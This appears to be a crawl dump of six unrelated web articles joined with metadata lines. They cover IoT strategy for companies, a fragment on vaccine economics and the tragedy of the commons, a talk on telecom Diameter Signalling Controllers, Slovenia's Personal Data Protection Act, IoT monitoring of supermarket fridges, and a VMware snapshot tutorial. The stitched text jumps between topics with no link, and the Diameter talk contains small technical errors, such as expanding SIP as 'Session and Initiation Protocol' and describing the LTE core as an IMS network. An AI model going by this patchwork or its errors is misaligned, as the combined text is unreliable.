IoThings – 5 Vital Methods Startup Companies Should Use It as a Tool to Fit Into the Newest Trend. First and foremost, the Internet of Things (IoT) simply means that our everyday objects now generate data and connect to the internet. What is the result? More data – a lot more data – from those objects, which we can put to good use in ways we could not have imagined even 20 years ago. Wristwatches can now monitor our sleep at night and keep track of our daily activities, music speakers and TVs understand what we say as commands, special golf clubs tell players how to improve their swing, and driverless cars, airplanes and ships make autonomous trips.
Internet of Things (IoT): 5 Essential Ways Every Company Should Use It
At the moment, reports have it that there are about fifteen billion IoT devices. It has been predicted that by 2020, the number will rise to between fifty and seventy billion devices connected to the internet from all over the world. What exactly does this mean? It's simple: the opportunities for using these IoT devices and the data they create are limitless. But herein lies the problem: it is far too easy for companies to get overwhelmed and lost by all these developments.
The question is: where do these companies start with the IoT – the Internet of Things? How best can they use the IoT? As a matter of fact, these are just some of the essential, billion-dollar questions about IoT devices. Regrettably, a lot of organisations are jumping on the IoT craze without giving much attention to how it connects to their business strategy. They do not consider how they could develop the greatest core business value.
Personally, I suggest that every sector make it a priority to take some time to determine how it might use the IoT (and the data that it generates) strategically to boost its business to the next level. I read a book by Bernard Marr titled 'Data Strategy: How To Profit From A World Of Big Data, Analytics And The Internet Of Things', in which the author identifies the following 5 essential ways companies can make good use of the Internet of Things; these should help any company structure its IoT plans and considerations.
Generally speaking, the following are the main uses of the Internet of Things (IoT) in every business:
- Improve decision-making
- Understand customers
- Deliver new customer value propositions
- Improve and optimize operations
- Generate an income and improve the value of the business
Now, I will walk you through their explanation from the beginning till the end. IoThings – Use it.
1. IoT helps to Improve decision-making
In the first place, the massive amount of new data from IoT sensors and devices simply adds to the huge pool of big data we now have in the world, and intelligent companies use that data for operational decision making and to inform strategic plans. Strategic decision-making is the area where the senior leadership team identifies the critical questions it needs answered. Operational decision-making is the area where analytics and data are made available to everybody in the company, often through a self-service tool, to inform data-driven decisions at all levels.
2. With IoT, Business will Better understand customers
From the look of things, more and more manufacturers are producing IoT-enabled products, which helps them connect directly to their customers' preferences and behaviours. Take Fitbit, for example: its activity-tracker wristwatch knows what our normal sleeping patterns are and how much exercise we get. Samsung can easily collect customer usage data from the smart TVs we buy. Kone, an elevator manufacturer, is using IoT data to learn how its customers are using its elevators in buildings.
Rolls-Royce, likewise, knows how local and international airlines use the jet engines it produces. On the other hand, even companies that don't manufacture IoT devices can regularly gain access to data from other people's devices via the internet. In fact, just think about app developers that are able to collect user data (cookies) because of the data collection and connectivity capabilities of the smartphones or tablets that run their apps. Furthermore, when the Internet of Things (IoT) is used appropriately, companies can leverage these insights to make faster and better business decisions. By accumulating the data, experts can look for new trends and isolate new business prospects.
3. Using IoT can Deliver new customer value propositions
As for me, I believe that a step further from using IoT devices to better understand customers is to make them part of your offering. As an illustration, tractor and farm equipment maker John Deere makes use of the IoT in several different ways to offer innovative new products and services to its farmer clients. These innovations range from self-driving tractors and trucks to intelligent farming solutions where sensors constantly monitor crop levels and soil health and give farmers advice on what fertilizer to use in a specific area of land and what crops to plant there.
4. Businesses can Improve and optimize operations using IoT
The data generated by all these IoT devices can also be used to improve the way companies are run. Similarly, it can help to automate factories and improve the efficiency of internal procedures. Uber, the smartphone app-based ride-booking service that connects passengers who need to get to a location with drivers, developed algorithms that use data from sensors and smartphones to observe traffic conditions and journeys in real time.
More importantly, not only does this real-time data help Uber to adjust its trip fares based on demand, it also helps manage the supply of drivers. When drivers see from the app analytics that demand is low, they will stay home. When they see that demand is high, they will head out to offer their driving services. Rolls-Royce is another great example.
The company's manufacturing systems are networked in an IoT environment. Online reports have it that at its factory in Singapore, it generates half a terabyte of manufacturing data on each individual fan blade it produces. After gathering this data, the company uses it for quality control purposes, a critical area of success for the organization.
5. IoT can help to make more income and improve the value of the business
If you are not aware, it's important to know that the data and insights our IoT devices generate are often very valuable to other companies. In light of this, the most direct way to realize this value is by selling the data or insights to other companies. Google's Nest is a perfect example: it collects real-time energy usage data from its consumers and is now able to sell these insights to utility companies and other interested parties.
Apart from direct income, data and a company's ability to use it is one of the most significant assets of modern companies. Keep in mind that data is a business asset that is just as critical, if not more critical, to manage and account for as other assets such as inventory and human capital. Therefore, whether your data assets simply support the bottom line of your organization's worth or you find other parties willing to pay for access to the data you collect, companies are finding extra value streams because of their data.
In final words, the Internet of Things (IoT) developments are not going to slow down anytime soon, but the faster your company develops and implements a new strategy, the more secure your company’s future will be in years to come. | <urn:uuid:b258b87d-b853-4035-a93e-ba6bb2e1acb2> | CC-MAIN-2022-40 | https://hybridcloudtech.com/iothings-5-vital-methods-startup-companies-should-use-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00319.warc.gz | en | 0.944905 | 1,621 | 2.59375 | 3 |
And the economics of vaccines – 20% IRR and 2 million deaths averted for the Global Alliance for Vaccines and Immunisation (GAVI) – a multi-organizational collaboration lasting 15 years and worth $13B:
Vaccinations are a case study of “The Tragedy of the Commons” – where anti-vaxxers become free-riders putting their self-interest over the common good. The Hastings Center explains this problem very well:
“…To understand why, think of vaccination and the quest for herd immunity as a collective action problem. Garrett Hardin’s “tragedy of the commons” illustrates the basic logic of collective action problems. Imagine that 50 farmers share common land (“the commons”) upon which they graze their sheep. The commons are lush, and so each farmer can easily allow four sheep to graze at a given time without depleting the resource. But imagine that each farmer seeks to maximize his own good (what economic theory refers to as “rational” behavior) and it is better for him to graze more sheep than fewer. The farmers will, in effect, be “free-riding” – in this case, taking more than their fair share of the common resource while benefitting from the restraint of others. The trouble is that, while adding one more sheep to the commons does not deplete the resource, adding 50 does. The combined actions of each farmer, acting rationally, leads to an outcome that is worse for all.
The tragedy of the commons reveals that what is good for the individual is at odds with what is good for all. This is the basic logic of collective action problems. We see a similar logic in the case of vaccines. If most get vaccinated, then everyone will be better off. But it would be best for any particular individual if all others got vaccinated and he or she did not. That way, the individual could enjoy the benefits of the common good (herd immunity) without bearing any of the costs (e.g., risk of possible side effects or complications associated with vaccine). This, again, is a free-rider temptation. The trouble is that if everyone thought that way, no one would become vaccinated and everyone would be at risk of falling ill.
From this perspective, anti-vaxxers are not ill-informed parents with distorted views of what is in their child’s best interest. They are acting perfectly rationally. The trouble is that there are enough of them to generate the tragedy of the commons. Hence, vaccination levels drop and measles rates rise. …” | <urn:uuid:4b40f54b-443c-4dbb-bb15-029e45700c97> | CC-MAIN-2022-40 | https://www.textor.ca/cr-publishes-much-needed-myths-and-facts-about-vaccines-for-children/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00319.warc.gz | en | 0.948183 | 578 | 3 | 3 |
Hi. This is Chuck Wesley-James, from Cellusys. In this presentation, we are going to look at Diameter Signalling Controllers (DSCs) and what they do in a telecom network.
We are going to make the assumption that you have some knowledge of the SS7 network, so that we can compare the Diameter Network with SS7.
Let’s take a look at some protocols involved. In 2G and 3G core networks, we used SS7 and two sub-protocols called ISUP and TCAP. In LTE or 4G, the core network is called an IMS network, and the ISUP and TCAP have been replaced by SIP and Diameter.
ISUP did the job of setting up the phone call. It made the far-end ring and set up the circuit switches. In the IMS network that job has been moved over to a protocol called SIP (Session and Initiation Protocol). You’ll be using that if you’re doing voice over LTE (VoLTE)
Now back on the 2G and 3G side, TCAP took care of a slightly higher level of control. It dealt with getting you authenticated onto the cell phone network. It determined whether you could roam and what services you were allowed to have. That protocol has been displaced by Diameter, so in the LTE/4G network, you will have Diameter providing the same functionality.
A few more details….
4G or LTE really has two backend networks: EPC and IMS, but that distinction isn’t needed in this short video. The EPC and IMS make use of two key signaling protocols in the core network:
- Session Initiation Protocol (SIP) used within the IMS for setting up sessions.
- Diameter used in both EPC and IMS for transactional events (requesting information).
Diameter is an IETF defined protocol originally designed for Authentication, Authorization, and Accounting (AAA) as an improvement over a protocol called RADIUS. Diameter improved on RADIUS by supporting:
- Improved failure handling
- More reliable message delivery
- Bigger information elements
- Improved security
- More flexible discovery of other nodes.
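To ground the discussion that follows, here is a rough sketch of what a Diameter request looks like to the software that has to route it: a command code plus a set of Attribute-Value Pairs (AVPs). The field names mirror common AVPs, but this is an illustrative model, not a real protocol stack.

```python
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class DiameterRequest:
    command_code: int                  # e.g. 316 is Update-Location-Request on S6a
    application_id: int                # e.g. 16777251 identifies the 3GPP S6a/S6d application
    origin_host: str
    origin_realm: str
    destination_realm: str
    destination_host: Optional[str] = None     # often absent on the first request to a realm
    avps: dict = field(default_factory=dict)   # everything else (IMSI, visited PLMN, ...)

ulr = DiameterRequest(
    command_code=316,
    application_id=16777251,
    origin_host="mme01.visited-operator.example",
    origin_realm="visited-operator.example",
    destination_realm="home-operator.example",
)
```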
These are the interfaces used in the IMS/EPC core network. For each of these interfaces, the diagram gives the network elements in the EPC/IMS network and labels the interfaces between them.
Rather than referring to an interface as between the HSS and the SGSN, we call it the S6a interface. It is sort of confusing to have to memorize these names, but that is what the industry uses.
Let’s take a look at a few of these interfaces:
Gy and Gx interfaces are a little special, they’re kind of unusual, and there’s a whole video on those, along with S6a. https://www.youtube.com/watch?v=8YCufy6nW-8
If you’re roaming then the S9 and the S6d interfaces are pretty important.
Let's face it: this diagram is pretty complicated. There are a lot of connections, and we've even simplified the diagram, because in a real network you're going to have a whole lot of MMEs. This is why you want to start looking at having a Diameter Signalling Controller. It simplifies all these connections.
Next, let’s take a look at why you want to simplify these connections.
Leaving the previous complicated diagram, let’s take a look at the purpose of the DSC or a Diameter Signalling Controller.
If you don’t have a DSC you are going to end up with a network shown on the left-hand side. It’s actually going to be even more complicated than this; it’s a mesh network. That means pretty well everything has to get connected to pretty well everything else. If you were to add a new HSS on to this diagram you’d have to have every MME connect to that new HSS. This is an Operations nightmare.
There’s just far too many connections to maintain. It also means you’ve probably got very little security on here and you certainly have no one place to go to take a look at where the traffic is flowing and how much. It is pretty hard to tell if too much traffic is taking place or if one node is carrying too much traffic. It also means you probably can’t connect to another carrier for roaming because you certainly wouldn’t want other carriers connecting directly to your HSS and directly to your PCRF.
It also means in this you’ve got a terrible network to troubleshoot.
- Operations nightmare
- Far too many connections
- New HSS implies modifying every MME
- No Security or Central Traffic view
- Terrible Troubleshooting
You need a central place to manage your network, which is what a DSC is going to do for you.
So let's simplify this mesh network by putting a DSC in the middle. If you come from an SS7 background, the DSC looks a lot like an SS7 STP. In SS7, the STP takes all the messages, decides where to route them, and sends them out again. This is done in a hub-and-spoke architecture, just like we're showing here.
Like an STP or even an IP router, the DSC turns a mesh network into a hub-and-spoke pattern.
This means that
- One place to make connections. For example, a new HSS node requires only one connection, saving you doing a modification in every MME
- One place for value-added processing like Signaling Firewalls or Billing
- One place for external entities to access your network – a DEA…. You would not want another operator connecting to your MME…. Especially not hundreds of other operators.
- One place for troubleshooting
Let’s take a look at the main functions of the DSC, and what people are going to be talking about.
Relay or Proxy Agent:
If you started learning about the DSC from the standards, you would have read about the relay or proxy agent. It is the base definition of a DSC. When a message comes into the DSC, it’s going to be from some node like an MME or HSS, and it is going to be sent to another node like a HSS or PCRF.
Most of the messages actually have a destination host and a destination realm, so the DSC’s job is pretty darned easy.
The difference between relay and proxy is simply that a proxy is allowed to change the message somewhat, but when you're out shopping for a DSC that's not going to come up in conversation: any decent DSC is going to be able to perform both Relay and Proxy functions.
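The relay job described above essentially boils down to a table lookup on the Destination-Host and Destination-Realm AVPs. Here is a simplified sketch; the peer names and realms are invented, and a real DSC would also weigh route priorities, load and peer state.

```python
from typing import Optional

# Peers the DSC currently has connections to, keyed by their Diameter identity.
PEERS = {"hss01.home.example", "hss02.home.example", "dea.partner.example"}

# Realm routing table: realm -> ordered list of candidate next hops.
REALM_ROUTES = {
    "home.example": ["hss01.home.example", "hss02.home.example"],
    "partner.example": ["dea.partner.example"],
}

def next_hop(destination_host: Optional[str], destination_realm: str) -> str:
    """Pick the peer to forward a request to: Destination-Host first, then the realm table."""
    if destination_host and destination_host in PEERS:
        return destination_host                    # a host route wins when we know that peer
    for candidate in REALM_ROUTES.get(destination_realm, []):
        if candidate in PEERS:
            return candidate                       # first available peer serving the realm
    raise LookupError(f"no route to realm {destination_realm!r}")

print(next_hop(None, "home.example"))              # hss01.home.example
print(next_hop("dea.partner.example", "partner.example"))
```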
A Diameter Routing Agent (DRA) is something else, and it can be pretty expensive, so let’s be sure of what we are talking about.
If you look at the standards for a DRA, you will see it is NOT a core router. It is something that specifically sits in front of a group of PCRFs. We tend to get lazy when we talk about DRAs as core routers, doing what we described under Relays and Proxies, but the strict definition of the DRA is only in front of PCRFs.
A DRA routes messages to specific PCRFs based on something called an IPCAN session. (Here is a video that goes in to more detail on DRAs and IPCAN sessions: https://www.youtube.com/watch?v=8YCufy6nW-8 . ) Depending on the smarts contained within your PCRF, you might not need a DRA. If your PCRF is running hot standby or multiple PCRF nodes are sharing the IPCAN session data you likely don’t need this functionality.
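The extra intelligence of a DRA is essentially a binding table: the first request for a subscriber's IPCAN session picks a PCRF, and every later message for that session must land on the same node. A rough sketch with invented names follows; a real DRA would also have to expire bindings when sessions terminate.

```python
import hashlib
from typing import Dict

PCRF_POOL = ["pcrf01.example", "pcrf02.example", "pcrf03.example"]
session_bindings: Dict[str, str] = {}      # IPCAN session key -> chosen PCRF

def route_to_pcrf(subscriber_id: str, apn: str) -> str:
    """Bind the first request for an IPCAN session to one PCRF, then stay sticky to it."""
    key = f"{subscriber_id}/{apn}"
    if key not in session_bindings:
        # Initial request (e.g. a Gx CCR-Initial): pick a PCRF, here by simple hashing.
        idx = int(hashlib.sha256(key.encode()).hexdigest(), 16) % len(PCRF_POOL)
        session_bindings[key] = PCRF_POOL[idx]
    return session_bindings[key]           # updates and terminations follow the same binding

print(route_to_pcrf("262011234567890", "internet"))
print(route_to_pcrf("262011234567890", "internet"))   # same PCRF the second time
```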
DRA functionality tends to be expensive, so ensure you actually need one before you go buy one. Otherwise stick to the basic DSC functions.
The Diameter Edge Agent (DEA) is a basic function of most DRAs, just like Relay/Proxy, but it does have more smarts.
The Diameter Edge Agent is the place where other carriers are going to connect. You don’t want other carriers to connect their MMEs and other nodes directly to your nodes. Operationally – it’s a mess. Security wise – it’s a complete mess.
So the Diameter Edge Agent’s job is to let the other carriers access your network functions in a controlled manner and to do some basic security. In the SS7 world, this would be called Network Gateway STP. Commonly carriers have one STP doing internal routing and acting as the Network Gateway. Similarly the DSC can also do internal routing and act as the DEA.
There are a couple other functions you might hear about.
The Interworking Function (IWF) typically sits between SS7 and Diameter. You might hear about it, but the commercial use cases for this are not great. There are not a lot of IWFs in the real world. If you carefully go through the use cases, and the functionality required in your SGSN and/or HLR, you will probably find you won't need this in your network.
The Subscriber Location Function (SLF) is a Diameter proxy agent or relay agent which looks up a list of subscribers in your network and then determines where it's going to send the message. You might need this if you've got an HSS and you've got so many subscribers that you have to divide them across multiple HSSs: here an SLF will help.
SLF functionality is really only used by the absolute largest carriers. They have a huge number of subscribers, forcing them to use an SLF. But if you are a smaller carrier and you don't need to maintain this extra list of subscribers on the SLF, then don't do it.
Let’s get back to the Diameter Edge Agent (DEA), because it’s pretty important.
A Diameter Edge Agent often works with a Signalling Firewall. A DEA typically has some security built into it, but security functions are going to get much more in depth when you work together with a Signalling Firewall.
The Signalling Firewall can sit directly on the Diameter links, or it can be a value-added feature on top of a DEA.
The DEA takes care of basic message routing. It knows about destination hosts, destination realms and routes messages. It can do some things like topology hiding. (If you’ve seen my other videos, you will know, I’m not too impressed with Topology Hiding as a security feature. https://www.youtube.com/watch?v=wRYetUZgdqU ) The DEA will take care of things like IPSec and DTLS to secure those connections and understand who they are. The DEA deals with that nodal connectivity. That’s its job, it’s a DSC at heart.
If you are using the Signalling Firewall as a value-added feature on the DEA, then what we want the DEA to do is send a subset of traffic to the Signalling Firewall. We want the DEA to send any of the traffic that's coming into your network, because that is traffic on which we want the Signalling Firewall to do some extra checks. Maybe the messages that are going between your own MMEs and your own HSS you don't want to send to the Signalling Firewall, or you just want to check them for throttling to make sure they're not sending too much traffic.
So you’ve got a lot of traffic choices you can make and the DEA is going to be able to determine which messages will go to the Signalling Firewall.
Let’s take a look at the Signalling Firewall and what it is doing.
The Signalling Firewall is one central place for all the security rules about what messages are going pass through your network.
You could have some rules for this in the DEA, some in the HSS, and some in the PCRF, but when you come to troubleshoot your network, or question why a given message was allowed through, you have a headache. When troubleshooting, to determine why you blocked a message, you would have to look in four different places. That's not good.
The Signalling Firewall should be the central place for all the rules. It needs to be able to provide some pretty exacting reporting and logging of what messages it drops and for what reasons. It is also one central place for all the protocols, because we know diameter is not the only protocol on your network. You’re probably also running SS7, maybe SMPP for your SMS messages and GTP. You can use the Signalling Firewall to act for all those protocols at one time, using the same database.
This will allow you to do per country and per carrier analysis and much better, because it’s one central place to look at all the data, regardless of what protocol was used.
The main function of the Signalling Firewall is to protect your network. Using rules to classify the messages, the Signalling Firewall is then going to ignore the message, return an error, or modify the message. The first step is to define those rules to find fraudulent or errant messages. The GSMA specifies category 1, 2 and 3 messages, and this is a good place to start, but not the end.
Category 3 messages are a little special. For these messages the Signalling Firewall needs to know some information about the subscriber before determining the validity of the message. Unlike a DEA, the Signalling Firewall can query the HSS, VLR or handset for that subscriber information before it makes a determination.
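As an illustration of why those checks need subscriber context, here is a toy plausibility test of the kind a firewall might apply to a location-sensitive request before trusting it; the data structures, thresholds and identifiers are entirely invented.

```python
from datetime import datetime, timedelta

# Hypothetical view of what the firewall last learned about each subscriber.
last_seen = {"001010123456789": ("DE", datetime(2018, 9, 10, 9, 0))}

def plausible_new_location(imsi: str, claimed_country: str, now: datetime,
                           min_travel_time: timedelta = timedelta(hours=2)) -> bool:
    """Reject requests that would imply impossible travel since the last known location."""
    if imsi not in last_seen:
        return True                        # nothing to compare against; other rules decide
    country, seen_at = last_seen[imsi]
    if country == claimed_country:
        return True
    return (now - seen_at) >= min_travel_time   # has there been enough time to actually move?

# Subscriber seen in Germany at 09:00, then "seen" in the US half an hour later: suspicious.
print(plausible_new_location("001010123456789", "US", datetime(2018, 9, 10, 9, 30)))   # False
```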
So the Signalling Firewall is pretty sophisticated on what it can do and it maintains lot of rules and past data. It is the place that brings together rules and protocols, to be one central place for troubleshooting.
During this presentation, I mentioned a couple of other videos. These are the links to them.
The first video will tell you about the Gx, Gy, and S6a interfaces. It explains in more detail what a DRA does with IPCAN sessions and why you might not really need a DRA.
The second video focuses on Diameter Security and how we haven’t really gotten any more secure from our SS7 days.
I hope you enjoy them.
Thank you for watching this video. I hope you have enjoyed it.
Please keep watching this space, as I plan to add more videos soon.
| <urn:uuid:22cc54ce-dd39-48ab-8b6e-94b92bcefbdc> | CC-MAIN-2022-40 | https://www.cellusys.com/2018/09/10/introduction-to-diameter-signalling-controllers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00319.warc.gz | en | 0.93064 | 3,172 | 2.515625 | 3 |
Defining the Constitutional Right of Privacy in Slovenia
Slovenia’s Personal Data Protection Act 2004 is a personal data protection law that was originally passed in 2004. Although Slovenia is a member state within the European Union and is subject to the provisions set out in the EU’s General Data Protection Regulation or GDPR, Slovenia is one of a handful of nations within the EU that has yet to pass a national law for the purposes of implementing the provisions of the EU’s GDPR law into Slovenian law. To this point, Slovenia’s Personal Data Protection Act 2004 has been amended several times, most recently in 2013, in order to provide Slovenian citizens with more updated privacy protections. Moreover, the Personal Data Protection Act 2004 and the EU’s GDPR law represent the primary legal guidelines for which personal data may be collected and processed within Slovenia.
How are data controllers and processors defined?
Under Slovenia’s Personal Data Protection Act 2004, a data controller is defined as “a natural person or legal person or other public or private sector person which alone or jointly with others determines the purposes and means of the processing of personal data or a person provided by statute that also determines the purposes and means of processing.” Alternatively, a data processor is defined as “a natural person or legal person that processes personal data on behalf and for the account of the data controller.” Furthermore, the law defines an individual as “an identified or identifiable natural person to whom personal data relates; an identifiable natural person is one who can be identified, directly or indirectly, in particular by reference to an identification number or to one or more factors specific to his physical, physiological, mental, economic, cultural or social identity, where the method of identification does not incur large costs or disproportionate effort or require a large amount of time.”
What are the requirements?
Data controllers and processors who conduct operations within Slovenia have the following responsibilities and obligations under Slovenia’s Personal Data Protection Act 2004:
- Personal data must be processed in a manner that is consistent with the principles of lawfulness and fairness.
- All personal data that is processed must be adequate in relation to the purposes for which it was collected or further processed.
- The “protection of personal data shall be guaranteed to every individual irrespective of nationality, race, color, religious belief, ethnicity, sex, language, political or other belief, sexual orientation, material standing, birth, education, social position, citizenship, place or type of residence or any other personal circumstance.”
- Sensitive personal data, such as data pertaining to racial or ethnic origin, may only be processed under certain circumstances, such as when an individual provides their consent for the processing of such information.
- All personal data that is processed must be accurate and kept up to date.
- Technical and organizational measures must be taken for the purposes of ensuring the security of personal data that is collected or processed.
What are the rights of Slovenian citizens under Slovenia’s Personal Data Protection Act 2004?
Under Slovenia’s Personal Data Protection Act 2004, Slovenian citizens have the following rights as it concerns data protection:
- The right to be informed.
- The right to access.
- The right to erasure.
- The right to rectification.
- The right to object or opt-out.
- The right of restriction.
- The right to judicial protection.
- The right to request a temporary injunction.
In terms of penalties that can be imposed against data controllers and processors who violate any of the rights stated above, Slovenia’s Personal Data Protection Act 2004 is enforced by Slovenia’s National Supervisory Body for Personal Data Protection or the National Supervisory Body for short. As such, the National Supervisory Body has the authority to impose a number of punishments against individuals and organizations who violate the provisions of the law. Such punishments include but are not limited to:
- “A fine from EUR 2.080 to 8.340 shall be imposed for a minor offense on a legal person, sole trader, or individual independently performing an activity, who implements video surveillance in contravention of Article 76.”
- “A fine from EUR 2.080 to 4.170 shall be imposed for a minor offense on a legal person, sole trader, or individual independently performing an activity, if in accordance with this Act he processes personal data for the purposes of direct marketing and does not act in accordance with Articles 72 or 73.”
- “A fine from EUR 4.170 to 12.510 shall be imposed for a minor offense on a legal person, sole trader, or individual independently performing an activity, if he processes personal data in accordance with this Act and fails to ensure the security of personal data (Articles 24 and 25).”
Although Slovenia has yet to enact a national law for the purposes of implementing the provisions of the EU’s GDPR law into Slovenian law, the provisions of the Personal Data Protection Act 2004 and subsequent amendments provide citizens of the country with a comprehensive level of data protection. To this end, the country of Slovenia has a long history of protecting the information of its citizens, as personal data is a constitutionally protected right under the Constitution of the Republic of Slovenia. As such, Slovenia has taken steps to ensure the personal privacy of its citizens, irrespective of the provisions set forth in the EU’s GDPR law. | <urn:uuid:aa161900-9b07-4105-8f9f-1cb58e015b7d> | CC-MAIN-2022-40 | https://caseguard.com/articles/defining-the-constitutional-right-of-privacy-in-slovenia/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00319.warc.gz | en | 0.914425 | 1,117 | 2.890625 | 3 |
This next installment of the Let's be Frank series looks back at how supermarkets rose to the challenges of the pandemic.
In case you hadn’t noticed, there’s been a bit of an increase in demand for food lately. If you wandered down to your local supermarket now – making sure to stay at least 6 feet apart from everyone else, of course – you’re likely to see bare aisles and sparse fridges. But, whilst the strange semi-apocalyptic scenes seen over the past few weeks have alarmed many, it is important to acknowledge that the supermarkets are, in fact, more than prepared to enable and ensure access to food for the duration of the public health situation.
Both the media and government have pointed to the strength of the food supply chain in order to calm nerves, but many have expressed concerns about the resilience of individual stores. While there are logistical ways in which more food can be delivered, spikes in demand, footfall and stock levels put pressure on individual stores and their physical assets. Fridges and freezers are having to work extra hard to maintain optimum temperatures that are being impacted by a combination of extremely high and extremely low levels of stock as well as doors constantly being opened and closed. This unusual activity also makes machine failure a risk.
So, why haven't we seen fridges breaking down and shops forced to close their doors? Largely because many retailers now operate 'smart stores'.
To the uninitiated, the term ‘smart store’ evokes images of futuristic robots whizzing round the aisles collecting what you’ve put on your holographic shopping list. In reality, a smart store is (unfortunately) a little less like a sci-fi movie. Nonetheless, smart store capabilities will be crucial in helping us get through the current period of demand spikes and panic shopping.
Many retailers use a series of connected technologies, under the umbrella term ‘the Internet of Things’. Through these connected systems, retail infrastructure, like fridges and freezers, can be monitored to ensure food is being kept at the right temperature, even with fluctuating levels of stock and the constant opening of doors. This real-time monitoring enables the fridges and freezers to automatically adapt to the optimum temperature required to keep stock fresh and safe to eat.
Machine failure is also mitigated through the use of IoT. By tracking the performance of fridges and freezers in real-time, making sure defrost cycles are normal and temperatures stay at a relative constant, the risk of critical faults developing is massively reduced. This is made possible by linking data from refrigeration performance to engineer work orders. In layman’s terms, effective IoT solutions can identify potential faults as soon as assets show signs of deviating from ‘normal’ behaviour. This data can be fed back into the work order system to help engineers predict when assets are at risk of breaking down and enable them to perform maintenance to not only prevent the ruining of stock, but also reduce the downtime of these extremely critical assets.
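To make the idea concrete, here is a minimal sketch of the kind of deviation check such a system might run on a fridge's temperature feed before raising a work order. It is illustrative only: the thresholds, asset IDs and work-order fields are assumptions, not any vendor's actual API.

```python
from statistics import mean, stdev

def deviates(recent_readings, latest, z_threshold=3.0):
    """Flag a reading that strays too far from the asset's recent behaviour."""
    baseline = mean(recent_readings)
    spread = stdev(recent_readings)
    if spread == 0:
        return False
    return abs((latest - baseline) / spread) > z_threshold

# A chilled cabinet that normally sits around 3 degrees C
recent = [3.1, 2.9, 3.0, 3.2, 2.8, 3.0, 3.1]

if deviates(recent, latest=7.4):
    # Feed the anomaly back into the work order system so an engineer
    # can intervene before stock is ruined.
    work_order = {"asset_id": "fridge-042", "fault": "temperature deviation", "priority": "high"}
    print("Raise work order:", work_order)
```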
Bottom line; by ensuring machines are working as close to 100% efficiency at as close to 100% of the time, we can rely on fridges and freezers to keep stock safe during this unprecedented, volatile time.
Technology like this is used in many supermarkets across the UK. IoT is making sure that food is stored safely whilst reducing the risk of fridges suddenly conking out and ruining all of those elusive chilled foods that everyone is on the lookout for. Images of empty shelves have understandably worried many, and it’s undeniable that the past few weeks have put a lot of pressure on supermarkets, but you can rest assured that retailers have the technology in place to keep cool and keep us fed. | <urn:uuid:2de796d8-dd48-4acf-9b26-43b83a51b3de> | CC-MAIN-2022-40 | https://www.ims-evolve.com/news/lets-be-frank-how-supermarket-fridges-are-keeping-cool-during-the-pandemic.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00319.warc.gz | en | 0.953103 | 780 | 2.546875 | 3 |
This post will talk about how VMware snapshots work, what they should and should not be used for, and provide a demonstration. A snapshot preserves the state and data of a virtual machine from a specific point in time. You can create multiple snapshots to save the virtual machine in different stages of a work process. Snapshots are managed using Snapshot Manager in the vSphere web client, or with PowerCLI. You should not manually alter any of the snapshot files as this may compromise the disk chain, with potential for data loss.
What happens when I take a snapshot?
When you take a snapshot of a virtual machine a number of files are created; a new delta disk (or child disk) is created for each attached disk, in vmdk format. The delta disks follow a naming convention and sequence of vmname-000001.vmdk, vmname-000002.vmdk and so on. These files are stored with the base vmdk by default. Any changes to the virtual machine are written to the delta file(s), preserving the base vmdk file. Think of this delta file as a change log, representing the difference between the current state and the state at the time the snapshot was taken. A .vmsd file is created to store the virtual machine snapshot information defining the relationships between child disks. A .vmsn file and corresponding .vmem file is created if the active state of the virtual machine memory is included in the snapshot. These configuration files are all stored in the virtual machine directory.
When should I use a snapshot?
Use a snapshot as a short-term restore point when performing changes such as updating software versions, or for testing software or configuration with unknown effects. You can create multiple snapshots of a virtual machine; VMware recommends no more than 32 snapshots in a chain, but best practice for performance is to keep the number low, i.e. 2-3 snapshots.
Do not use a snapshot as a backup. Although it provides a restore point, a snapshot relies on the base disk(s); without these, the snapshot files are worthless. If you need a restore point for more than a few days, consider other options such as a traditional backup, or cloning the virtual machine. According to vSphere best practices, a single snapshot should not be used for more than 24 – 72 hours. There are a number of factors that determine how long a snapshot can be kept, such as the amount of changed data, and how the application will react to rolling back to a previous point in time. Some disk types and configurations are not supported by snapshots; you can see a full list of limitations here.
What are the risks of using a snapshot?
The more changes that are made within the virtual machine, the more data is written to the delta file. This means the delta file grows quickly and, in theory, can grow as large as the virtual disk itself if the guest operating system writes to every block of the virtual disk. This is why snapshots are strictly a short-term solution. Ensure there is sufficient space in the datastore to accommodate snapshots; if the datastore fills up, any virtual machines residing in that datastore will be suspended.
How do I take a snapshot?
From the vSphere web client right click the virtual machine to snapshot, select Snapshots, and Take Snapshot. Note that vCenter Server is not a requirement, snapshots are also supported through the local ESXi host web UI.
Enter a name and description for the snapshot. The contents of the virtual machine's memory are included in the snapshot by default, retaining the live state of the virtual machine. If you do not capture the memory state, the virtual machine files require quiescing; otherwise, should the virtual machine be reverted to a previous state, the disks are only crash-consistent. The exception is taking a snapshot of a powered-off virtual machine, as it is not possible to capture the memory state or quiesce the file system.
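The same memory/quiesce choice is exposed through the vSphere API, so snapshots can also be scripted. Below is a minimal sketch using the open-source pyVmomi Python bindings; the host name, credentials and VM name are placeholders, and certificate verification is disabled purely for a lab setting.

```python
import ssl
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import vim

ctx = ssl._create_unverified_context()          # lab only; validate certificates in production
si = SmartConnect(host="vcenter.lab.local", user="administrator@vsphere.local",
                  pwd="VMware1!", sslContext=ctx)

def find_vm(content, name):
    """Return the first virtual machine whose name matches."""
    view = content.viewManager.CreateContainerView(content.rootFolder, [vim.VirtualMachine], True)
    try:
        return next(v for v in view.view if v.name == name)
    finally:
        view.Destroy()

vm = find_vm(si.RetrieveContent(), "web01")

# memory=True captures the live memory state; quiesce only matters when memory is not
# captured and requires VMware Tools in the guest.
vm.CreateSnapshot_Task(name="pre-upgrade",
                       description="Before applying the application update",
                       memory=True,
                       quiesce=False)

Disconnect(si)
```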
To view active snapshots locate the virtual machine in the vSphere web client and select the Snapshot tab. Snapshots are listed in order with ‘you are here’ representing the current state, at the end of the snapshot chain.
